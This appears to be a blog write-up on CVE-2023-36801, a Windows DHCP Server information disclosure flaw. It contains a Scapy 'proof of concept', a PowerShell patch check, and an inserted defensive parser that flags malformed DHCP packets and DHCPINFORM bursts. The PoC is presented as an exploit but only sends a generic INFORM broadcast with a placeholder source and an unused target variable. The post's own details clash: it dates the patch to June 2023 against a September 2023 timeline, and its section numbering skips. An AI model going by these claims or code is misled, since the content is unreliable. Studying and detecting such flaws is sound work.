Every year, new security vulnerabilities are discovered, putting network infrastructures at risk. CVE-2023-36801 is one such vulnerability that affects the DHCP Server Service on Windows platforms. This flaw opens up an avenue for attackers to gather sensitive information about your network — a classic case of an Information Disclosure Vulnerability. In this deep dive, we'll break down what CVE-2023-36801 is, how it works, provide code snippets, and share details for recognizing and mitigating the threat.
1. What is CVE-2023-36801?
CVE-2023-36801 is a critical security issue found within the Windows DHCP Server, mainly affecting Windows Server platforms where DHCP is enabled. This bug lets an unauthenticated attacker retrieve sensitive data from your DHCP server. While it doesn't grant remote code execution, the exposed information can be leveraged for later attacks, such as lateral movement or privilege escalation.
Microsoft classified this issue as Information Disclosure and released a patch in June 2023 Patch Tuesday.
2. The Technical Details
DHCP (Dynamic Host Configuration Protocol) automates network configuration. In this vulnerability, the server fails to properly handle certain malformed DHCP requests or packets. An attacker can intentionally craft these special requests and send them to a vulnerable server. In return, the DHCP server responds by revealing internal details, such as network structure, domain info, or service configurations, which are not supposed to be public.
For context, Microsoft states:
> *"The vulnerability allows an unauthenticated attacker to send a specially crafted network packet to an affected DHCP server and disclose information from the system."*
> — Microsoft Security Response Center
Affected systems are Windows Server 2012, 2016, 2019 and 2022 with the DHCP Server role enabled.
Servers without the DHCP role, or patched after June 2023, are not affected.
3. Proof of Concept (PoC) Code
Below is an example Python script that demonstrates how an attacker might exploit this vulnerability. This code uses the Scapy library to craft and send a custom DHCP INFORM packet to extract information from the DHCP server.
```python
from scapy.all import *

# Replace with target DHCP server's IP address
dhcp_server_ip = "192.168.1.1"

# Build the DHCP INFORM packet
packet = (Ether(dst='ff:ff:ff:ff:ff:ff') /
          IP(src="...", dst="255.255.255.255") /
          UDP(sport=68, dport=67) /
          BOOTP(op=1, chaddr=RandMAC()) /
          DHCP(options=[('message-type', 'inform'), 'end']))

# Send packet and wait for response
sendp(packet, iface="eth")

# Listen for responses (requires root privileges)
ans = sniff(filter="port 68", iface="eth", timeout=3)
for p in ans:
    if p.haslayer(DHCP):
        print('DHCP server responded:', p.summary())
        # Exposed information can be parsed here
```
Note: This PoC is for testing in a lab environment only. Never use it on systems you do not own.
While CVE-2023-36801 does not allow full system takeover, it does pose several risks:
- Network Mapping: Exposed data can reveal network subnets, internal IP address ranges, router addresses, or DNS suffixes.
- Domain Intel: Attackers may learn about internal domains, helping them craft phishing or lateral movement attacks.
- Pivoting: Knowledge of DHCP options and configurations can make it easier to target other services running in the environment.
*Real-world networking breaches often start with information disclosure like this before escalating to more serious exploits!*
- Confirm whether the server is running a vulnerable Windows Server version.
- Look up the installed Windows updates. Make sure the June 2023 security patch is present (KB5027277, KB5027243, etc.).

PowerShell script example:

```powershell
Get-HotFix | Where-Object {$_.Description -like "*Security Update*"} |
    Where-Object {$_.HotFixID -like "*5027*"}  # adjust the KB number if needed
```

- Look for unusual DHCP INFORM or malformed DHCP requests.
- Audit event logs for strange traffic on port 67/68.
- Regularly audit and monitor DHCP logs for anomalous activity.
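The last three items ask you to watch for INFORM bursts and malformed DHCP requests on port 67/68, but the post gives no code for that side. The following is an added example, not part of the original post and not Microsoft's or Scapy's code: a small Python parser that walks the RFC 2131 fixed header and RFC 2132 option field of each captured UDP payload, records every structural defect it finds (missing magic cookie, option length that overruns the packet, missing END, duplicate or missing message-type), and counts DHCPINFORM messages per client hardware address so a burst from one host stands out. The specific packet that triggers CVE-2023-36801 is not described on the page and is not reproduced here; the parser only flags the generic signals the list above tells you to look for. `INFORM_THRESHOLD`, the `build_dhcp` helper and all sample packets are constructed for the demonstration.

```python
"""Added example (not from the original post): flag DHCPINFORM bursts and
structurally malformed DHCP requests in captured UDP/67 payloads.

The parser follows the RFC 2131 fixed header and RFC 2132 option layout.
It does not know the specific packet that triggers CVE-2023-36801 (the post
does not describe it); it surfaces the generic signals the post says to
watch for. INFORM_THRESHOLD and all sample packets are constructed."""
import struct
from collections import Counter

MAGIC_COOKIE = b"\x63\x82\x53\x63"          # RFC 2132 option-field cookie
OPT_PAD, OPT_MSG_TYPE, OPT_END = 0, 53, 255
MSG_TYPES = {1: "DISCOVER", 2: "OFFER", 3: "REQUEST", 4: "DECLINE",
             5: "ACK", 6: "NAK", 7: "RELEASE", 8: "INFORM"}
INFORM_THRESHOLD = 3   # constructed tuning value: INFORMs per client before alerting


def parse_dhcp(payload: bytes) -> dict:
    """Parse one DHCP message; 'errors' lists every malformation found."""
    errors = []
    if len(payload) < 240:                  # 236-byte header + 4-byte cookie
        return {"chaddr": None, "msg_type": None, "options": {},
                "errors": ["short packet (<240 bytes)"]}
    hlen = payload[2]
    if hlen > 16:
        errors.append(f"hlen {hlen} exceeds 16-byte chaddr field")
    chaddr = payload[28:28 + min(hlen, 16)].hex(":")
    if payload[236:240] != MAGIC_COOKIE:
        errors.append("missing DHCP magic cookie")
    options, i, saw_end = {}, 240, False
    while i < len(payload):
        code = payload[i]
        if code == OPT_PAD:
            i += 1
            continue
        if code == OPT_END:
            saw_end = True
            break
        if i + 1 >= len(payload):
            errors.append(f"option {code} truncated before its length byte")
            break
        length = payload[i + 1]
        value = payload[i + 2:i + 2 + length]
        if len(value) < length:             # length byte overruns the packet
            errors.append(f"option {code} declares {length} bytes, only {len(value)} present")
            break
        if code in options:
            errors.append(f"duplicate option {code}")
        options[code] = value
        i += 2 + length
    if not saw_end:
        errors.append("no END option")
    mt = options.get(OPT_MSG_TYPE)
    if mt is None or len(mt) != 1:
        errors.append("missing or malformed message-type option")
        msg_type = None
    else:
        msg_type = MSG_TYPES.get(mt[0], f"type-{mt[0]}")
    return {"chaddr": chaddr, "msg_type": msg_type, "options": options, "errors": errors}


def analyze(packets) -> tuple:
    """Return (alerts, inform_counts) for a sequence of raw DHCP payloads."""
    alerts, informs = [], Counter()
    for idx, raw in enumerate(packets):
        p = parse_dhcp(raw)
        if p["errors"]:
            alerts.append(f"pkt {idx}: malformed DHCP from {p['chaddr']}: " + "; ".join(p["errors"]))
        if p["msg_type"] == "INFORM":
            informs[p["chaddr"]] += 1
    for mac, n in informs.items():
        if n >= INFORM_THRESHOLD:
            alerts.append(f"{mac}: {n} DHCPINFORM requests (threshold {INFORM_THRESHOLD})")
    return alerts, informs


def build_dhcp(msg_type, mac, extra_options=b"", cookie=MAGIC_COOKIE, end=True) -> bytes:
    """Construct a minimal BOOTREQUEST (op=1, Ethernet) for the samples below."""
    hdr = struct.pack("!BBBBIHH4s4s4s4s", 1, 1, 6, 0, 0x3903F326, 0, 0x8000,
                      b"\0" * 4, b"\0" * 4, b"\0" * 4, b"\0" * 4)
    hdr += mac + b"\0" * 10             # chaddr padded to 16 bytes
    hdr += b"\0" * 192                  # sname (64) + file (128)
    opts = bytes([OPT_MSG_TYPE, 1, msg_type]) + extra_options
    if end:
        opts += bytes([OPT_END])
    return hdr + cookie + opts


# Constructed sample capture: two hosts, one of them sending repeated INFORMs.
MAC_A, MAC_B = bytes.fromhex("0011223344aa"), bytes.fromhex("0011223344bb")
SAMPLE_PACKETS = [
    build_dhcp(1, MAC_A),                                   # ordinary DISCOVER
    build_dhcp(8, MAC_B),                                   # INFORM
    build_dhcp(8, MAC_B),
    build_dhcp(8, MAC_B),                                   # third INFORM from one host
    build_dhcp(8, MAC_A, extra_options=bytes([12, 40]) + b"host", end=False),  # option 12 claims 40 bytes, 4 present
    build_dhcp(3, MAC_A, cookie=b"\0\0\0\0"),               # REQUEST without magic cookie
]

if __name__ == "__main__":
    found, counts = analyze(SAMPLE_PACKETS)
    for line in found:
        print(line)
```

In practice you would feed `analyze()` the UDP payloads of port 67 traffic pulled from a capture on the DHCP server's segment; the Windows DHCP audit log does not record message structure, so packet-level parsing is the only way to see the malformed-option case. The per-client threshold is deliberately low for the sample; tune it against a baseline of normal INFORM traffic (Windows clients send INFORMs routinely for proxy discovery and similar options) before alerting on it.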
7. References
- Microsoft Security Advisory — CVE-2023-36801
- Patch details for KB5027243 (Windows Server 2019)
- Scapy Python Library for Packet Crafting
- DHCP Inform Packet Explained
Conclusion
CVE-2023-36801 highlights that even straightforward infrastructure services like DHCP can hide dangerous vulnerabilities. While it doesn’t let attackers break in outright, it can reveal enough about a network to help stage further attacks. The fix is simple: keep your systems patched! Regularly check for updates and keep your critical network services shielded from prying eyes.
Stay safe and keep learning! If you found this post useful, share it with your IT team and bookmark the references for your next security review.
Timeline
Published on: 09/12/2023 17:15:00 UTC
Last modified on: 09/12/2023 19:38:00 UTC